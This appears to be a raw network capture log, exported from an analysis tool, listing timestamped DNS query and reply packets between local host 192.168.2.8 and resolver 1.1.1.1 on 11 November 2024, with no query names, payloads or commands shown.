                                                                                                                                                                                                              Nov 11, 2024 18:34:03.948223114 CET6189353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.955219984 CET53549691.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.955233097 CET53532911.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.969744921 CET5562453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.979027987 CET53618931.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.043672085 CET6170953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.047482967 CET6431553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.052838087 CET4964153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.053982973 CET53617091.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.063126087 CET53496411.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.063697100 CET6447553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.067842960 CET6014953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.068061113 CET5948353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.068506002 CET5339653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.075615883 CET5543253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.077590942 CET53594831.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.078306913 CET53601491.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.078448057 CET53643151.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.078896046 CET5596453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.079083920 CET53533961.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.079724073 CET5317853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.085325956 CET6302253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.089971066 CET53559641.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.090215921 CET6200953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.095089912 CET53644751.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.097273111 CET53630221.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.100517988 CET53620091.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.107458115 CET53554321.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.111255884 CET53531781.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.120433092 CET5965653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.120722055 CET5188853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.120997906 CET5611553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.121167898 CET6328153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.121611118 CET5890653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.121794939 CET5112753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.124286890 CET5308553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.124547958 CET5564353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.124799013 CET5917453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.124964952 CET5228753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.125344992 CET5145253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.125513077 CET6158653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.129712105 CET53632811.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.130954027 CET53596561.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.131511927 CET53561151.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.131894112 CET53589061.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.134776115 CET53514521.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.134795904 CET53591741.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.146256924 CET6250353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.148139000 CET4942353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.148644924 CET6145953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.148873091 CET5447653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.149293900 CET6270953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.149471998 CET6155453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.151488066 CET53518881.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.152317047 CET53511271.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.155113935 CET53522871.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.155531883 CET53625031.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.155692101 CET53530851.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.155951977 CET53556431.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.156621933 CET53615861.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.158230066 CET53544761.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.159178019 CET53627091.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.159881115 CET5639853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.160115957 CET5013053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.160507917 CET6154753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.164937973 CET6397053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.165186882 CET5489453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.165635109 CET5846653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.165906906 CET5694953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.166157961 CET5278053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.166404009 CET5717153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.166570902 CET6080153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.166949987 CET6191753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.167104006 CET5764653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.167161942 CET53614591.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.167361975 CET53615471.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.167370081 CET5402553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.167567968 CET5585553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.167823076 CET6109353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.168941021 CET4981253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.169908047 CET53563981.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.175277948 CET53639701.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.176213980 CET53619171.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.176845074 CET53584661.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.177102089 CET53556241.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.177509069 CET53558551.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.177658081 CET53540251.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.177671909 CET53576461.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.178107023 CET53608011.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.178591967 CET53610931.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.180126905 CET53494231.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.180253983 CET53498121.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.181056023 CET53615541.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.182235956 CET6023253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.182663918 CET5071053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.182862997 CET4940753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.188446999 CET5472053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.191817045 CET53501301.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.193856001 CET53602321.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.194978952 CET5076653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.195194006 CET5458353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.195679903 CET53548941.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.195895910 CET5604053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.196404934 CET5924053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.197019100 CET53527801.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.197654963 CET53569491.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.198524952 CET53547201.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.200567007 CET53571711.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.206407070 CET53545831.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.206450939 CET53592401.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.206814051 CET53560401.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.206824064 CET53507661.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.214287043 CET53507101.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.214629889 CET53494071.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.274111986 CET53616001.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.886164904 CET5265453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.886851072 CET5879253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.893652916 CET53526541.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.920212030 CET5946553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.142472982 CET6200353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.142995119 CET6426253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.144262075 CET5956953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.144752026 CET5500253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.144939899 CET6176753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.145052910 CET4992153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.146047115 CET5207153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.146585941 CET6439153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.152604103 CET53499211.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.152832985 CET53620031.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.154076099 CET53550021.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.154980898 CET53595691.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.162049055 CET53617671.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.162195921 CET53643911.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.174040079 CET53642621.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.178366899 CET53520711.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.300460100 CET6008753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.311300993 CET53600871.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.322865009 CET53594651.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.368679047 CET53587921.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.770462990 CET5853853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.770771980 CET6489953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.770823956 CET5824853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.771269083 CET6496353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.771766901 CET6442153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.776046991 CET5037353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.779721975 CET53585381.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.779968977 CET53582481.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.782133102 CET53644211.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.794058084 CET53503731.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.801872969 CET4967453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.802052975 CET53649631.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.803318977 CET53648991.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.806886911 CET6211153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.811130047 CET53496741.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.811335087 CET5119353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.812119007 CET4987753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.812119007 CET5357553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.816934109 CET53621111.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.821425915 CET53511931.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.821438074 CET53535751.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.821456909 CET53498771.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.827297926 CET5633553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.827497959 CET5145853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.830363035 CET5334253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.831289053 CET5099753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.835134983 CET53563351.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.835860968 CET6169553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.837415934 CET53514581.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.842432022 CET5888553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.844907999 CET53616951.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.846596956 CET5345153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.850891113 CET53509971.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.852880001 CET53588851.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.857167959 CET5336953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.861213923 CET4918653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.862375021 CET53533421.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.865056038 CET5270353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.866230011 CET5677853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.866677999 CET5765653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.867872953 CET5921553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.868402004 CET4928253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.869740009 CET5266453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.871570110 CET5448453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.871731043 CET53491861.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.872549057 CET5023653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.874875069 CET53527031.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.875861883 CET6338753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.875969887 CET53567781.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.876260042 CET53576561.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.877270937 CET53534511.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.877388954 CET53492821.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.877954960 CET5741953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.878146887 CET5046253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.878305912 CET53592151.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.879318953 CET53526641.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.880343914 CET6030353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.881010056 CET6337853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.881129026 CET6338853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.881643057 CET6484053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.882489920 CET5481053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.882513046 CET53502361.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.884757996 CET5786353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.885008097 CET5276453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.885953903 CET53633871.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.886547089 CET5764353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.886939049 CET53504621.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.887685061 CET53574191.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.887788057 CET53633781.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.889102936 CET53533691.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.890624046 CET53633881.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.890974998 CET53603031.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.891304016 CET53648401.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.892029047 CET6307353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.895173073 CET53527641.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.895657063 CET53578631.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.896863937 CET53576431.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.900559902 CET53548101.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.901592970 CET53630731.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.901813984 CET5608053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.902240992 CET53544841.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.912178040 CET53560801.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.913614035 CET5925753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.914400101 CET6159453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.914846897 CET5353453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.915016890 CET5359653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.917371988 CET5089453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.917716026 CET6299953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.918118000 CET6448753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.924179077 CET6208053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.924263954 CET6480353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.924747944 CET5477353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.924947023 CET6537253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.925626993 CET53615941.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.925640106 CET53535341.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.925769091 CET53535961.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.927215099 CET53508941.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.929414988 CET6017453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.929555893 CET53644871.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.930365086 CET4980653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.930552006 CET6432453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.930572987 CET5431853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.931065083 CET5703153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.931474924 CET5039953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.931679010 CET6251853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.931802988 CET5473853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.931879044 CET5604353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.932009935 CET5020553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.932075977 CET6520153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.932194948 CET5418253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.932437897 CET5949853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.938147068 CET53592571.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.938158035 CET53653721.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.938169003 CET53620801.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.938179970 CET53547731.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.943345070 CET53503991.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.943948030 CET53502051.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.944464922 CET53570311.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.944475889 CET53543181.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.945688963 CET53498061.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.945700884 CET53541821.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.951502085 CET53643241.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.951546907 CET53547381.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.952126026 CET53594981.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.952378035 CET53629991.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.955565929 CET53648031.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.963987112 CET53652011.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.965212107 CET53560431.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.966164112 CET53625181.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.967065096 CET53601741.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:06.051239014 CET5773953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:06.053092003 CET6422953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:06.054693937 CET4959953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:06.055141926 CET6056653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:06.055639982 CET6358253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:06.062196016 CET53577391.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:06.065109968 CET53605661.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:06.065124989 CET53642291.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:06.065618992 CET53495991.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:06.066849947 CET53635821.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.703726053 CET5772953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.709765911 CET5054853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.714513063 CET53577291.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.714807987 CET6549653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.719202995 CET53505481.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.722862959 CET5669653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.724086046 CET5459853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.736330032 CET53566961.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.737891912 CET6264353192.168.2.81.1.1.1
